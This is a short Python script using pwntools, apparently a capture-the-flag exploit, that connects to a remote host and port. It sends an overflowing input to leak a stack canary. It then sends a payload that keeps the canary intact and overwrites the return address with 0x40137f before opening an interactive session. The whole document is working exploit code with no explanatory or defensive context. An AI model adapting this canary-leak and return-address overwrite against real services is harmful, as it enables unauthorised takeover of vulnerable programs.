from pwn import remote, p64 NEEDLE = b'Quack Quack ' LEN_NEEDLE = len(NEEDLE) with remote("83.136.251.145", "32656") as p: p.recvuntil(b'> ') p.sendline(b'A' * 0x59 + NEEDLE) canary = b'\x00' + p.recvuntil(b'> ')[LEN_NEEDLE:LEN_NEEDLE + 7] assert(len(canary) == 8) exploit_string = (b'A' * 0x58) + canary + p64(0) + p64(0x40137f) print(exploit_string) p.sendline(exploit_string) p.interactive()